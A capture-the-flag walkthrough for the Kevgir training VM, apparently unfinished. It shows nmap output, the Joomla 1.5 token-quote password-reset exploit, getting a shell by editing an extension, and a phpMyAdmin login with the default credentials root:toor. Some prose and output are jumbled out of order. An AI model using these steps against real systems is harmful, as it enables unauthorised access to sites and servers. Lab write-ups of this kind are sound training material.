Kevgir has designed by canyoupwnme team for training, hacking practices and exploiting. Kevgir has lots of vulnerable services and web applications for testing. We are happy to announced that.
Scanning with aggresive mode all ports gives us following result
root@kali:/var/www/html# nmap -p- -A -sV 192.168.56.102I examined tcp 111 port, and it serves nfs.
[...]
PORT STATE SERVICE VERSION
25/tcp open ftp vsftpd 3.0.2
|_smtp-commands: SMTP: EHLO 530 Please login with USER and PASS.
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Kevgir VM
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/udp nfs
| 100005 1,2,3 44879/tcp mountd
| 100005 1,2,3 59451/udp mountd
| 100021 1,3,4 44714/tcp nlockmgr
| 100021 1,3,4 58080/udp nlockmgr
| 100024 1 33372/udp status
| 100024 1 38214/tcp status
| 100227 2,3 2049/tcp nfs_acl
|_ 100227 2,3 2049/udp nfs_acl
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: CANYOUPWNME)
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: CANYOUPWNME)
1322/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 17:32:b4:85:06:20:b6:90:5b:75:1c:6e:fe:0f:f8:e2 (DSA)
| 2048 53:49:03:32:86:0b:15:b8:a5:f1:2b:8e:75:1b:5a:06 (RSA)
|_ 256 3b:03:cd:29:7b:5e:9f:3b:62:79:ed:dc:82:c7:48:8a (ECDSA)
2049/tcp open nfs_acl 2-3 (RPC #100227)
6379/tcp open redis Redis key-value store
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
| http-methods:
|_ Potentially risky methods: PUT DELETE
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat
8081/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-generator: Joomla! 1.5 - Open Source Content Management
| http-robots.txt: 14 disallowed entries
| /administrator/ /cache/ /components/ /images/
| /includes/ /installation/ /language/ /libraries/ /media/
|_/modules/ /plugins/ /templates/ /tmp/ /xmlrpc/
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Welcome to the Frontpage
9000/tcp open http Jetty winstone-2.9
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Jetty(winstone-2.9)
|_http-title: Dashboard [Jenkins]
36574/tcp open mountd 1-3 (RPC #100005)
38214/tcp open status 1 (RPC #100024)
40719/tcp open unknown
43973/tcp open ssh Apache Mina sshd 0.8.0 (protocol 2.0)
44714/tcp open nlockmgr 1-4 (RPC #100021)
44879/tcp open mountd 1-3 (RPC #100005)
50921/tcp open mountd 1-3 (RPC #100005)
[...]
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.4
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_nbstat: NetBIOS name: CANYOUPWNME, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Unix (Samba 4.1.6-Ubuntu)
| Computer name: canyoupwnme
| NetBIOS computer name: CANYOUPWNME
| Domain name:
| FQDN: canyoupwnme
|_ System time: 2016-07-11T15:06:20+03:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server supports SMBv2 protocol
[...]
root@kali:/var/www/html# showmount -e 192.168.56.102But I cannot mount this directory to local path. So, let's try play with web applications. Default web page on 80 port looks as follow
Export list for 192.168.56.102:
/backup *
Nice graph. Our target hosts several web applications, so it is not wise to enumerate each of them. We can find in nmap result that on 8081 HTTP is a web application which has assigned robots.txt and disallowed is in particular /administrator/.
Excellent! Joomla CMS! In the source code we can find information that this is version 1.5. We know that this version has wide known exploit.
OK, I did 1,2 and 3Example :1. Go to url : target.com/index.php?option=com_user&view=reset&layout=confirm2. Write into field "token" char ' and Click OK.3. Write new password for admin4. Go to url : target.com/administrator/5. Login admin with new password
Great! So, let's log in as admin. After that, we have to click on extenstions and edit one of them. Executing it we have got limited shell!
Great! Let's look at config file
Excellent! We found valid credentials and some secret.
I have examined thr target OS version and it is Ubuntu 14.04.3, so we know effective exploit dedicated for it.
Game over!
Second way to compromise our target
So, I decided to try harder with web application hosted on 80 port. I had run Dirb and I have got following result
---- Scanning URL: http://192.168.56.102/ ----We can see that there is /phpmyadmin/ directory. I have tried use default credentials to log in and BINGO! root:toor are valid credentials.
+ http://192.168.56.102/cgi-bin/ (CODE:403|SIZE:289)
+ http://192.168.56.102/index.html (CODE:200|SIZE:236)
==> DIRECTORY: http://192.168.56.102/javascript/
==> DIRECTORY: http://192.168.56.102/phpmyadmin/
+ http://192.168.56.102/server-status (CODE:403|SIZE:294)
---- Entering directory: http://192.168.56.102/javascript/ ----
==> DIRECTORY: http://192.168.56.102/javascript/jquery/
Unfortunately we don't have enough privileges to upload PHP backdoor via phpmyadmin and cannot read /etc/shadow using MySQL as well.
TBU
TBU
